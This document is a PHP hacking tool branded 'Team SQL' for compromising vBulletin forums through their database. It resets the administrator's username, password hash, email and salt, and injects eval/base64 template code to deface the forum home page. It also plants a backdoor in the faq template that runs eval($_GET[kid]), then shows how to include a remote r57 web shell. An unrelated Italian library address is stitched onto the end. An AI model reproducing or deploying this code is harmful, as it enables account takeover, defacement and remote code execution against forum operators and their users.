<?php
/*
|.|.|.|.|.|.|.|.|.|.|.|.|.|.|.|.|.|.|.|.|.|.|.|.|.|.|
|.|###################################################|.|
|.|# #|.|
|.|# <==-|Team SQL|-==> - <==-|9q-Live.Com *-* SQL@Live.se-==> #|.|
|.|# WWW.TEAM-SQL.COM #|.|
|.|###################################################|.|
|.|.|.|.|.|.|.|.|.|.|.|.|.|.|.|.|.|.|.|.|.|.|.|.|.|.|
*/
?>
<html><style>
input, select, textarea {
background-color: #000000;
border-style: #7a7c7d;
border-width: 1px;
font-family: verdana, arial, sans-serif;
font-size: 11px;
color: #FF0000;
padding: 0px;
}
A:link {
COLOR:#FF0000; TEXT-DECORATION: none
}
A:visited {
COLOR:#A2A2A2; TEXT-DECORATION: none
}
A:active {
COLOR:#787878; TEXT-DECORATION: none
}
A:hover {
color:#FF0000;TEXT-DECORATION: none
}
</style>
<head>
<title>Change admin data,Change All pages & shell (faq.php) For Forum</title>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
</head>
<body bgcolor="black" text="#7a7c7d">
<div align="center">
<H2><u>Team<strong>SQL</strong>Mahmoud</u></H2>
| <a href="mailto:SQL@Live.se">SQL(AT)Live(DoT)Se</a> |<br>
<u>Change admin data,Change All pages & shell (faq.php) For Forum </u>
<br><br>
<?
if(empty($_POST['ur'])){
echo "<FORM method=\"POST\">
host : <INPUT size=\"15\" value=\"localhost\" name=\"localhost\" type=\"text\">
database : <INPUT size=\"15\" value=\"vb\" name=\"database\" type=\"text\"><br>
username : <INPUT size=\"15\" value=\"root\" name=\"username\" type=\"text\">
password : <INPUT size=\"15\" value=\"qazwsx\" name=\"password\" type=\"password\"><br>
<br>
<textarea name=\"ur\" cols=\"3\" rows=\"1\">kid</textarea><br>
<text name=\"kid\" >username : kid</text><br>
<text name=\"kid\" >pass : qazwsx</text><br>
<text name=\"kid\" >email : SQL@Live.se</text><br>
<INPUT value=\"Change\" name=\"send\" type=\"submit\">
</FORM>";
}else{
$localhost = $_POST['localhost'];
$database = $_POST['database'];
$username = $_POST['username'];
$password = $_POST['password'];
$ur = $_POST['ur']['ps']['em']['st'];
@mysql_connect($localhost,$username,$password) or die(mysql_error());
@mysql_select_db($database) or die(mysql_error());
$index=str_replace("\'","'",$ur);
$set_ur .= "kid";
$ok=@mysql_query("UPDATE user SET username ='".$set_ur."' WHERE userid ='1'") or die(mysql_error());
$index=str_replace("\'","'",$ps);
$set_ps .= "d6723ced98897149d9ecf629e1694d17";
$ok=@mysql_query("UPDATE user SET password ='".$set_ps."' WHERE userid ='1'") or die(mysql_error());
$index=str_replace("\'","'",$em);
$set_em .= "Nz@hotmail.com";
$ok=@mysql_query("UPDATE user SET email ='".$set_em."' WHERE userid ='1'") or die(mysql_error());
$index=str_replace("\'","'",$st);
$set_st .= "kid";
$ok=@mysql_query("UPDATE user SET salt ='".$set_st."' WHERE userid ='1'") or die(mysql_error());
if($ok){
echo "!! update finish !!<br><br>";
}
}
if(empty($_POST['index'])){
echo "<FORM method=\"POST\">
host : <INPUT size=\"15\" value=\"localhost\" name=\"localhost\" type=\"text\">
database : <INPUT size=\"15\" value=\"vb\" name=\"database\" type=\"text\"><br>
username : <INPUT size=\"15\" value=\"root\" name=\"username\" type=\"text\">
password : <INPUT size=\"15\" value=\"qazwsx\" name=\"password\" type=\"password\"><br>
<br>
<textarea name=\"index\" cols=\"40\" rows=\"10\">Set Your Index</textarea><br>
<INPUT value=\"Change\" name=\"send\" type=\"submit\">
</FORM>";
}else{
$localhost = $_POST['localhost'];
$database = $_POST['database'];
$username = $_POST['username'];
$password = $_POST['password'];
$index = $_POST['index'];
@mysql_connect($localhost,$username,$password) or die(mysql_error());
@mysql_select_db($database) or die(mysql_error());
$index=str_replace("\'","'",$index);
$set_index = "{\${eval(base64_decode(\'";
$set_index .= base64_encode("echo \"$index\";");
$set_index .= "\'))}}{\${exit()}}</textarea>";
$ok=@mysql_query("UPDATE template SET template ='".$set_index."' WHERE title ='FORUMHOME'") or die(mysql_error());
if($ok){
echo "!! update finish !!<br><br>";
}
}
if(empty($_POST['faq'])){
echo "<FORM method=\"POST\">
host : <INPUT size=\"15\" value=\"localhost\" name=\"localhost\" type=\"text\">
database : <INPUT size=\"15\" value=\"vb\" name=\"database\" type=\"text\"><br>
username : <INPUT size=\"15\" value=\"root\" name=\"username\" type=\"text\">
password : <INPUT size=\"15\" value=\"qazwsx\" name=\"password\" type=\"password\"><br>
<br>
<textarea name=\"faq\" cols=\"40\" rows=\"10\">Set shell TrYaG Team</textarea><br>
<INPUT value=\"Change\" name=\"send\" type=\"submit\">
</FORM>";
}else{
$localhost = $_POST['localhost'];
$database = $_POST['database'];
$username = $_POST['username'];
$password = $_POST['password'];
$faq = $_POST['faq'];
@mysql_connect($localhost,$username,$password) or die(mysql_error());
@mysql_select_db($database) or die(mysql_error());
$index=str_replace("\'","'",$faq);
$set_faq .= ("$faq");
$set_faq .= " ";
$ok=@mysql_query("UPDATE template SET template ='".$set_faq."' WHERE title ='faq'") or die(mysql_error());
if($ok){
echo "!! update finish !!<br><br>";
}
}
if(empty($_POST['inc'])){
echo "<FORM method=\"POST\">
host : <INPUT size=\"15\" value=\"localhost\" name=\"localhost\" type=\"text\">
database : <INPUT size=\"15\" value=\"vb\" name=\"database\" type=\"text\"><br>
username : <INPUT size=\"15\" value=\"root\" name=\"username\" type=\"text\">
password : <INPUT size=\"15\" value=\"qazwsx\" name=\"password\" type=\"password\"><br>
<br>
<textarea name=\"inc\" cols=\"40\" rows=\"2\">{\${eval(\$_GET[kid])}}</textarea><br>
<INPUT value=\"Change\" name=\"send\" type=\"submit\">
</FORM>";
}else{
$localhost = $_POST['localhost'];
$database = $_POST['database'];
$username = $_POST['username'];
$password = $_POST['password'];
$inc = $_POST['inc'];
@mysql_connect($localhost,$username,$password) or die(mysql_error());
@mysql_select_db($database) or die(mysql_error());
$index=str_replace("\'","'",$inc);
$set_inc = "\$spacer_open
{\${eval(base64_decode(\'";
$set_inc .= base64_encode("echo \"$inc\";");
$set_inc .= "\'))}}{\${exit()}}&
\$_phpinclude_output";
$ok=@mysql_query("UPDATE template SET template ='".$set_inc."' WHERE title ='faq'") or die(mysql_error());
if($ok){
echo "faq.php?kid=include('http://localhost/shell/r57.txt');<br><br>";}
}
# Footer
echo "<strong>SpeciaL GreeTz To :</strong> <u> Mr.Sohayl ^_^ Mahmoud ^_^ Mr Danger</u>";
?>
Centro Sistema Bibliotecario
c/o Biblioteca Comunale Via S.Olimpia 31 - 09047 Selargius
tel. 070 8592601 - e-mail info@ladiris.it - PEC protocollo@pec.comune.selargius.ca.it